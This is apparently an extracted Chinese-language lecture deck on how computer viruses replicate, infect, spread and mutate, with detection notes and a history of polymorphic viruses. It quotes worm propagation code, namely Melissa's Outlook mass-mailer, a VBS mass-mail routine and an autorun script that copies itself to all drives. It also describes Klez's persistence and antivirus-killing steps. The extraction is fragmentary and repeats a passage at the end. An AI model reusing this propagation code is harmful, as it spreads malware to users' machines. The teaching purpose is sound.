1、21計(jì)算機(jī)病毒的自我復(fù)制 自我復(fù)制是計(jì)算機(jī)病毒的最重要特征，要闡述清楚它為什么具有了自我復(fù)制的功能-信息的數(shù)字化和可存儲(chǔ)是基本；不同病毒的自我復(fù)制實(shí)現(xiàn)不同. 病毒的自我復(fù)制功能被絕大多數(shù)讀者認(rèn)為是病毒的最奇妙的技術(shù)。其實(shí)，信息的數(shù)字化和機(jī)器的拷貝功能是計(jì)算機(jī)病毒自我復(fù)制技術(shù)的基礎(chǔ)，只不過(guò)復(fù)制不是由計(jì)算機(jī)用戶操作完成，而是病毒本身來(lái)完成，下面將一一介紹。第1頁(yè)/共34頁(yè)21計(jì)算機(jī)病毒的自我復(fù)制 2.1.1生物病毒和計(jì)算機(jī)病毒的復(fù)制比較 生物病毒的復(fù)制 生物病毒是一種生物實(shí)體，它能夠使用細(xì)胞所具有的機(jī)制和物質(zhì)對(duì)自己進(jìn)行再制造，離開(kāi)宿主它不能存在。 計(jì)算機(jī)病毒的復(fù)制 作為計(jì)算機(jī)病毒一般具有一下兩個(gè)特

2、征： 1該段程序寄生于宿主程序中，宿主程序執(zhí)行時(shí)，該段程序首先被執(zhí)行。即具有寄生性。 2該段程序能夠自我復(fù)制到其他宿主程序中，即具有傳染性。且被感染的程序運(yùn)行時(shí)，病毒程序能夠進(jìn)一步感染其他目標(biāo)程序，從而使病毒得到傳播。能夠進(jìn)行自我復(fù)制計(jì)算機(jī)病毒的執(zhí)行過(guò)程可以這樣描述：第2頁(yè)/共34頁(yè)At the beginning is one SRP -/*Phase I : INFECTION Process*/A: .Search in a given directory if file.If (file is found) then.If (fingerprint in file) then.Chan

3、ge to next entry in directory.go to A :. else.Copy the SRP code : The infected code ofhost must start by the Search function and amove is needed to avoid to overwriting code. Save preinfection entry of host.endif.else .Change directory.go to A :.end if/*Phase 2 : ACTION Process*/.If (trigger) thenAC

4、TION process.end if.go to preinfection entry in host program- Now : a new SRP.- Later. a lot of SRPs.第3頁(yè)/共34頁(yè)2.1.2計(jì)算機(jī)病毒自我復(fù)制示例VC寫的病毒自我傳播的示例：void CMeCopyDlg:OnMeCopy() /只所以寫這類程序希望大家能明白的是病毒怎么感染和自我傳播的,我會(huì)把它的各個(gè)功能寫出來(lái).char syspath256=0,pepath256=0;int errsys=:GetWindowsDirectoryA(syspath,255); /獲取系統(tǒng)路徑; int

5、errpe=:GetCurrentDirectory(256,pepath); /獲取當(dāng)前路徑;/-這里是沒(méi)有獲取到路徑時(shí)的處理-/*.省略.*/char path256=0; /-開(kāi)始復(fù)制文件方法1- char comm256=0;wsprintf(comm,xcopy /c/r/y %smecopy.exe %ssystem32mecopy.exe,pepath,syspath); /這里設(shè)定命令是不管什么只是復(fù)制.$_$. wsprintf(path, 系統(tǒng)路徑:%sn 程序路徑:%sn 拷貝命令:%s ,syspath,pepath,comm);MessageBox(path,Get

6、Path:);/ system(comm); /這種復(fù)制是用DOS復(fù)制的,回有個(gè)DOS閃爍一下!回被發(fā)現(xiàn)哦./另外一種復(fù)制方法:char path1256=0;char path2256=0;wsprintf(path2,%ssystem32mecopy.exe,syspath);wsprintf(path1,%smecopy.exe,pepath);int cpyerr=CopyFile(path1,path2,1);if(cpyerr=0)MessageBox(Copy File Error!);第4頁(yè)/共34頁(yè)2.1.2計(jì)算機(jī)病毒自我復(fù)制示Melissa病毒的自我復(fù)制部分的代碼片段如下：

7、If UngaDasOutlook = “Outlook” ThenDasMapiName.Logon “profile”,”password”For y= 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x= 1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo =1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASli

8、ce.Recipients.Add Peepx= x+1If x50 Then oo= AddyBook.AddressEntries.CountNext ooBreakUmOffASlice.Subject = “Importrant Message From” & Application.UserNameBreakUmOffASlice.Body = “Here is that document you asked for .dont show anyone else ;-)”BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameB

9、reakUmOffASlice.SendPeep = “”Next yDasMapiName.LogoffEnd If第5頁(yè)/共34頁(yè)2.1.3病毒自我復(fù)制的結(jié)構(gòu)和模型 Cohen在1984年為計(jì)算機(jī)病毒提出了一個(gè)形式化的數(shù)學(xué)模型，這個(gè)模型使用圖靈機(jī)。實(shí)際上Cohen的計(jì)算機(jī)病毒的形式化數(shù)學(xué)模型與Neumann的自我復(fù)制細(xì)胞自動(dòng)機(jī)是十分像似的。從Neumann的角度，我們可以說(shuō)計(jì)算機(jī)病毒就是一個(gè)可以自我復(fù)制的細(xì)胞自動(dòng)機(jī)。病毒的自我復(fù)制結(jié)構(gòu)程下面的金字塔型結(jié)構(gòu)：第6頁(yè)/共34頁(yè)2.1.3病毒自我復(fù)制的結(jié)構(gòu)和模型圖2.1 病毒自我復(fù)制功能的金字塔型結(jié)構(gòu)第7頁(yè)/共34頁(yè)2.1.4基于自我復(fù)制功能的檢

10、測(cè) 病毒的自我復(fù)制的結(jié)構(gòu)和描述有些類似于句子的生成，這是病毒的最根本的一個(gè)特征，即使其他的特征不明顯，依據(jù)自我復(fù)制的特征就可以判別是否為病毒，因此本節(jié)介紹自我復(fù)制在病毒檢測(cè)中方法和依據(jù)，詳細(xì)而系統(tǒng)的病毒檢測(cè)將在防治篇中介紹。病毒自我復(fù)制功能的檢測(cè)類似文本的自動(dòng)生成理論。前面對(duì)自我復(fù)制功能的描述就是一個(gè)有窮自動(dòng)機(jī)的形式。第8頁(yè)/共34頁(yè)2.1.4基于自我復(fù)制功能的檢測(cè)在自我復(fù)制功能的檢測(cè)過(guò)程中，所有的系統(tǒng)調(diào)用都被監(jiān)視器截獲，然后被發(fā)往復(fù)制檢測(cè)模塊，在這里包含了一整套不同的檢測(cè)和過(guò)濾機(jī)制。 圖4.3.一場(chǎng)動(dòng)作的檢測(cè)算法第9頁(yè)/共34頁(yè)2.2計(jì)算機(jī)病毒的感染機(jī)制 2.2.1計(jì)算機(jī)病毒感染機(jī)制的概述

11、2.2.2計(jì)算機(jī)病毒的目的及實(shí)現(xiàn) 2.2.3計(jì)算機(jī)病毒的傳染方式 2.2.4一個(gè)典型病毒的源碼(感染部分)剖析 2.2.5總結(jié)第10頁(yè)/共34頁(yè)2.2.1計(jì)算機(jī)病毒感染機(jī)制的概述 大多數(shù)的病毒都會(huì)用如下的一段偽代碼來(lái)檢查某目標(biāo)是否已被感染（復(fù)合的感染是相當(dāng)明顯的）。 BEGIN IF (infectable_object_found) AND (object_not_already_infected) THEN (infect_object) END 下一步就是將病毒代碼安裝到可被感染的目標(biāo)中，這可能需要一步或更多的操作來(lái)實(shí)現(xiàn)，其數(shù)目取決于病毒的類型。病毒代碼安裝的方式有： 在引導(dǎo)區(qū)中寫入一段

12、新代碼。 將該代碼附加于某個(gè)程序文件。 將宏代碼附加于.doc 文檔。 將代碼附加于標(biāo)準(zhǔn)系統(tǒng)程序，截?cái)嗑W(wǎng)絡(luò)服務(wù)以便將與受感染文件相連的鏈接發(fā)送到被俘獲的email地址中去。第11頁(yè)/共34頁(yè)2.2.2計(jì)算機(jī)病毒的目的及實(shí)現(xiàn) 那么病毒在什么情況下被首次執(zhí)行呢? 染有引導(dǎo)型病毒的磁盤在啟動(dòng)計(jì)算機(jī)時(shí)(無(wú)論該磁盤是否是真正的DOS引導(dǎo)盤，是否真正將計(jì)算機(jī)啟動(dòng)成功)，病毒被執(zhí)行。 文件型病毒在執(zhí)行染毒EXE和COM文件時(shí)被執(zhí)行。 初始化批處理啟動(dòng)病毒。 混合型病毒在以上幾種情況下都被執(zhí)行。第12頁(yè)/共34頁(yè)2.2.3計(jì)算機(jī)病毒的傳染方式 引導(dǎo)型感染：引導(dǎo)型病毒的代表有：Brain病毒，Stoned 病毒

13、等。 寄生感染：病毒將其代碼放入宿主程序中，或者在頭部或者在尾部亦或者在中部。 滋生感染：滋生感染式病毒又名伴侶病毒。 破壞性感染： 1990年9月產(chǎn)于原西德的Number one病毒，1991年12月產(chǎn)于加拿大的small38病毒就屬于此類。 混合感染：既感染文件又感染主引導(dǎo)扇區(qū)或Boot扇區(qū)的混合感染病毒。 交叉感染：第13頁(yè)/共34頁(yè)2.2.4一個(gè)典型感染剖析 “求職信”病毒是最早出現(xiàn)于2001年年底，相繼出現(xiàn)了多個(gè)變種，專門攻擊微軟公司Outlook及Outlook Express的弱點(diǎn)。由于此病毒多以求職為郵件內(nèi)容，所以很容易迷惑用戶，用戶只要打開(kāi)(甚至是預(yù)覽)帶有這種病毒的電子郵件

14、，就能夠?qū)е虏《镜陌l(fā)作。當(dāng)病毒駐留系統(tǒng)后可能會(huì)強(qiáng)行關(guān)閉用戶正在進(jìn)行的正常操作，甚至?xí)h除硬盤上的14種文檔。 “求職信”病毒程序具有雙程序結(jié)構(gòu)，分為蠕蟲部分(網(wǎng)絡(luò)傳播)和病毒部分(感染文件，破壞文件)。第14頁(yè)/共34頁(yè)2.2.4一個(gè)典型感染剖析 當(dāng)“求職信”病毒被激活后(用戶打開(kāi)或預(yù)覽了帶病毒的郵件)，將按下列步驟對(duì)系統(tǒng)進(jìn)行破壞。 1.安裝木馬 2.修改注冊(cè)表 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce Wink*=wink*.exe 3.中止反病毒程序 ACKWIN32,ALERTSVC,AMON,ANTI

15、VIR,NOD32,Norton,等51個(gè)程序 4.繁殖 病毒將自身復(fù)制到本地硬盤、網(wǎng)絡(luò)映射盤和局域網(wǎng)的共享硬盤上，復(fù)制的文件都具有雙重?cái)U(kuò)展名，一般如下： 第一個(gè)后綴為：BAK、BAT、C、CPP、DOC、EXE、HTM、HTML、MP3、MP8、MPEG、MPQ、5.傳播 經(jīng)搜索到的郵件地址發(fā)送帶病毒的電子郵件，發(fā)送的帶毒附件的文件名格式和復(fù)制的文件名格式是一樣的。6.修改可執(zhí)行文件第15頁(yè)/共34頁(yè)2.2.5總結(jié) 隨著互聯(lián)網(wǎng)的日益發(fā)展，計(jì)算機(jī)病毒的危害越來(lái)越大，計(jì)算機(jī)病毒的感染方式也愈來(lái)愈多。但病毒的最根本還是自我復(fù)制。在整個(gè)生命期中還采用了隱藏、加密、觸發(fā)條件的手法，等等。本人對(duì)計(jì)算機(jī)病

16、毒感染機(jī)制進(jìn)行了敘述，但不盡詳略。隨著計(jì)算機(jī)病毒的防治愈加重要，對(duì)計(jì)算機(jī)病毒感染機(jī)制的研究也將更深入和廣泛。第16頁(yè)/共34頁(yè)2.3計(jì)算機(jī)病毒的傳播機(jī)制 2.3.1計(jì)算機(jī)病毒的傳播方式 2.3.2計(jì)算機(jī)病毒傳播原理 2.3.3 典型網(wǎng)絡(luò)病毒傳播源碼分析 2.3.4 通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播的原理第17頁(yè)/共34頁(yè)2.3.1計(jì)算機(jī)病毒的傳播方式 通過(guò)網(wǎng)絡(luò)傳播 1 通過(guò)網(wǎng)絡(luò)的瀏覽和下載傳播 2 通過(guò)電子郵件等傳播 3 通過(guò)即時(shí)通訊軟件傳播 4 通過(guò)局域網(wǎng)傳播 5 通過(guò)網(wǎng)頁(yè)或軟件等的漏洞進(jìn)行傳播 通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播 其它傳播方式第18頁(yè)/共34頁(yè)2.3各

17、種傳播途徑比例第19頁(yè)/共34頁(yè)2.3.2計(jì)算機(jī)病毒傳播原理 1 蠕蟲的目標(biāo)定位 收集電子郵件地址 進(jìn)行網(wǎng)絡(luò)共享枚舉攻擊。 網(wǎng)絡(luò)掃描和目標(biāo)指紋攻擊。 網(wǎng)絡(luò)蠕蟲能夠掃描遠(yuǎn)程系統(tǒng)，他們使用預(yù)定義的網(wǎng)絡(luò)地址類（指IP地址類）表產(chǎn)生隨機(jī)的IP地址；隨機(jī)掃描：蠕蟲W32/Slammer。Slammer攻擊UDP的1434（SQL server）端口，它不檢測(cè)IP地址是否有效。第20頁(yè)/共34頁(yè)2.3.2計(jì)算機(jī)病毒傳播原理2 感染傳播 攻擊安裝了后門的系統(tǒng)。有些蠕蟲使用使用其它蠕蟲留下的后門接口進(jìn)行傳播，如W32/Borm，它感染安裝了Back Orifice的系統(tǒng)。具體攻擊過(guò)程如下： )隨機(jī)產(chǎn)生一個(gè)IP

18、地址，并用Back Orifice的BO_PING參查看是否安裝有后門； )Borm向服務(wù)器發(fā)送一個(gè)BO_HTTP_ENABLE命令，指示Back Orifice在系統(tǒng)上使用TCP協(xié)議的12345端口建立HTTP代理服務(wù)。 )蠕蟲連接服務(wù)器，用MIME編碼上傳自己，蠕蟲通過(guò)BO_PROCESS_SPAWN命令在服務(wù)器上運(yùn)行剛剛上傳的可執(zhí)行程序，進(jìn)行新的傳播。第21頁(yè)/共34頁(yè)2.3.3 典型網(wǎng)絡(luò)病毒傳播源碼分析 1 蠕蟲病毒W(wǎng)orm.Japanize的傳播實(shí)例第22頁(yè)/共34頁(yè)2.3.3 典型網(wǎng)絡(luò)病毒傳播源碼分析2 v b s 腳 本 病 毒 通 過(guò) 網(wǎng) 絡(luò) 傳 播 的 幾 種 方 式 及 代

19、 碼 分 析Function mailBroadcast()Set mapiObj=outlookApp.GetNameSpace(MAPI) /獲取MAPI的名字空間For Each addr In addrList/獲取每個(gè)地址表的Email記錄數(shù) For addrEntIndex= 1 To addrEntCount /遍歷地址表的Email地址Set item = outlookApp.CreateItem(0) /獲取一個(gè)郵件對(duì)象實(shí)例Set addrEnt = addr.AddressEntries(addrEntIndex) /獲取具體Email地址item.To = addrEn

20、t.Address /填入收信人地址 .Set attachMents=item.Attachments /定義郵件附件attachMents.Add fileSysObj.GetSpecialFolder(0)&test.jpg.vbsitem.DeleteAfterSubmit = True /信件提交后自動(dòng)刪除If item.To Then item.Send /發(fā)送郵件shellObj.regwrite HKCUsoftwareMailtestmailed, 1 /病毒標(biāo)記，以免重復(fù)感染第23頁(yè)/共34頁(yè)2.3.4 通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播的原理1主動(dòng)傳播病毒從帶毒載體進(jìn)入內(nèi)存，一般是利用

21、操作系統(tǒng)的加載機(jī)制或引導(dǎo)機(jī)制。病毒從內(nèi)存侵入無(wú)毒介質(zhì)，則利用操作系統(tǒng)的讀寫磁盤中斷向量入口地址或修改加載機(jī)制(例如INT13H或INT21H)，使該中斷向量指向病毒程序感染模塊。內(nèi)存中的病毒時(shí)刻監(jiān)視著操作系統(tǒng)的每一個(gè)操作，這樣，一旦系統(tǒng)執(zhí)行磁盤讀寫操作或系統(tǒng)功能調(diào)用,病毒感染模塊就會(huì)被激活,感染模塊在判斷感染條件滿足的條件下,把病毒自身感染給被讀寫的磁盤或被加載的程序，病毒被按照病毒的磁盤儲(chǔ)存結(jié)構(gòu)存放在磁盤上，然后再轉(zhuǎn)移到原中斷服務(wù)程序執(zhí)行原有的操作。大部分此類的Windows病毒要正確運(yùn)行，則必須調(diào)用API或系統(tǒng)服務(wù)。此類計(jì)算機(jī)病毒感染的一般過(guò)程有：當(dāng)宿主程序運(yùn)行時(shí)，截取控制權(quán)；尋找感染的突

22、破口；將病毒代碼故人宿主程序。第24頁(yè)/共34頁(yè)Autorun主動(dòng)傳播事例autorun.vbs ：on error resume nextSet WshShell =CreateObject(WScript.Shell)if 1=0 thenelseFor i=1 to 1set Of = CreateObject(Scripting.FileSystemObject) set dir = Of.GetSpecialFolder(1)Set dc = Of.Drivesif WScript.ScriptFullName=dir&autorun.vbs thenisdir=trueelsea=

23、WshShell.Run(autorun.bat Open ,0,False)isdir=falseend ifFor Each d In dc If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and dA: and d B:) Then a=WshShell.Run(autorun.bat - &d ,0,True)if isdir thenOf.CopyFile dir&autorun.bat,d&,TrueOf.CopyFile dir&sxs.exe,d&,TrueOf.CopyFile dir&autorun.inf

24、,d&,TrueOf.CopyFile dir&autorun.reg,d&,TrueOf.CopyFile dir&autorun.vbs,d&,TrueelseOf.CopyFile autorun.bat,d&,True第25頁(yè)/共34頁(yè)Auto run 傳播事例Of.CopyFile sxs.exe,d&,TrueOf.CopyFile autorun.inf,d&,TrueOf.CopyFile autorun.reg,d&,TrueOf.CopyFile autorun.vbs,d&,Trueend ifa=WshShell.Run(autorun.bat + &d ,0,True

25、)End Ifnextif isdir thenwscript.sleep 60000i=0elsea=WshShell.Run(autorun.bat - &dir ,0,True)Of.CopyFile autorun.bat,dir&,TrueOf.CopyFile sxs.exe,dir&,TrueOf.CopyFile autorun.inf,dir&,TrueOf.CopyFile autorun.reg,dir&,TrueOf.CopyFile autorun.vbs,dir&,Truea=WshShell.Run(autorun.bat + &dir ,0,True)End i

26、fnextEnd if第26頁(yè)/共34頁(yè)2.3.4 通過(guò)移動(dòng)存儲(chǔ)介質(zhì)傳播的原理2被動(dòng)傳播 用戶在進(jìn)行拷貝磁盤或文件時(shí),把一個(gè)病毒由一個(gè)載體復(fù)制到另外一個(gè)載體上。或者執(zhí)行一個(gè)染毒的程序時(shí)，導(dǎo)致病毒運(yùn)行而感染。 有時(shí)病毒會(huì)使用一種巧妙的方式誘騙用戶執(zhí)行病毒，病毒把U盤下所有文件夾隱藏，并把自己復(fù)制成與原文件夾名稱相同的具有文件夾圖標(biāo)的文件，當(dāng)你點(diǎn)擊時(shí)病毒會(huì)執(zhí)行自身并且打開(kāi)隱藏的該名稱的文件夾。第27頁(yè)/共34頁(yè)2.3.5總結(jié) 病毒的傳播方式是多種多樣的，同一種病毒可能有多種傳播方式。病毒的傳播技術(shù)是隨著計(jì)算機(jī)技術(shù)的發(fā)展而發(fā)展。在本節(jié)中，簡(jiǎn)單地討論了計(jì)算機(jī)病毒利用網(wǎng)絡(luò)及移動(dòng)存儲(chǔ)介質(zhì)的傳播原理，著重分

27、析了網(wǎng)絡(luò)環(huán)境下的病毒傳播，列出了常用的傳播技術(shù)。 第28頁(yè)/共34頁(yè)2.4病毒的偽裝及變種機(jī)制 2.4.1 變形病毒的概念及形式定義 2.4.2 變形病毒的分類 2.4.3變形病毒的常用技術(shù) 2.4.4變形病毒的現(xiàn)行發(fā)展和發(fā)展趨勢(shì) .5小結(jié)第29頁(yè)/共34頁(yè)2.4.1 變形病毒的概念及形式定義 加密病毒階段 單變形病毒階段 準(zhǔn)變形病毒階段 全變形病毒階段 變形病毒的概念 變形病毒的形式定義第30頁(yè)/共34頁(yè)2.4.2 變形病毒的分類 以下根據(jù)變形病毒的變化能力將其劃分為四類： 1.一維變形病毒 2. 二維變形病

28、毒 3. 三維變形病毒 4.四維變形病毒第31頁(yè)/共34頁(yè)2.4.3變形病毒的常用技術(shù) 變形病毒主要采用一種變形驅(qū)動(dòng)機(jī)構(gòu)（也稱作變形引擎metamorphic engine）。這里變形引擎主要?jiǎng)澐譃槲宀糠郑侯A(yù)處理器、還原器、病毒主代碼、病毒引擎驅(qū)動(dòng)器、變形器。 一般常采用加密、分支技術(shù)、偽隨機(jī)索引解密技術(shù)、程序演化、反仿真技術(shù)、重定位技術(shù)等技術(shù)。第32頁(yè)/共34頁(yè)2.4.4變形病毒的發(fā)展和趨勢(shì) 1992年，我們首次發(fā)現(xiàn)了國(guó)內(nèi)第一例變形病毒，病毒名字為“Doctor”(醫(yī)生)。 目前， 已發(fā)現(xiàn)了許許多多變形病毒， 如名字稱為“Doctor” (醫(yī)生)、NewFlip(顛倒屏幕)、Casper(卡

29、死脖幽靈)、Ghost/One_Half/3544(幽靈)、VTech、NATAS/4744(拿他死幽靈王)、1982/(福州大學(xué)HXH)、1748/HXH、2560/HYY、V3、HYY/3532(福州1號(hào)變形王)、Tremor、5VOLT4、CLME、1748/HXH、NEW DIR2、CONNIE2臺(tái)灣2號(hào)變形王、MADE-SP、HEFEI（合肥1號(hào)，2號(hào)）、JOKE、NIGHTALL、WIN-Marburg、WIN32/HPS、WIN32/CXDZ、WIN32/MATRIX、I-WORM/MAGISTR（馬吉思）等病毒。 將來(lái)變形技術(shù)發(fā)展趨勢(shì):變形病毒更加智能,復(fù)雜,分體合作.第33頁(yè)

30、/共34頁(yè).4.5小結(jié) 變形技術(shù)是當(dāng)今計(jì)算機(jī)病毒技術(shù)研究的熱點(diǎn)和難點(diǎn)，是計(jì)算機(jī)病毒技術(shù)主要的發(fā)展趨勢(shì)，是病毒技術(shù)和反病毒技術(shù)爭(zhēng)奪的焦點(diǎn)。計(jì)算機(jī)變形病毒發(fā)展迅速，并且和別的技術(shù)的結(jié)合，已造成對(duì)信息安全的巨大威脅。如何分析計(jì)算機(jī)病毒變形技術(shù)對(duì)于保障信息安全是非常重要的，對(duì)于國(guó)家的國(guó)防建設(shè)意義相當(dāng)大。所以深入研究計(jì)算機(jī)變形技術(shù)十分必要。第34頁(yè)/共34頁(yè)At the beginning is one SRP -/*Phase I : INFECTION Process*/A: .Search in a given directory if file.If (file is found) then.I

31、f (fingerprint in file) then.Change to next entry in directory.go to A :. else.Copy the SRP code : The infected code ofhost must start by the Search function and amove is needed to avoid to overwriting code. Save preinfection entry of host.endif.else .Change directory.go to A :.end if/*Phase 2 : ACTION Process*/.If (trigger) thenACTION process.end if.go to preinfection entry in host program- Now : a new SRP.- Later. a lot of SRPs.第3頁(yè)/共34頁(yè)2.1.3病毒自我復(fù)制的結(jié)構(gòu)和模型 Cohen在1984年為計(jì)算機(jī)病毒提出了一個(gè)形式化的數(shù)學(xué)模型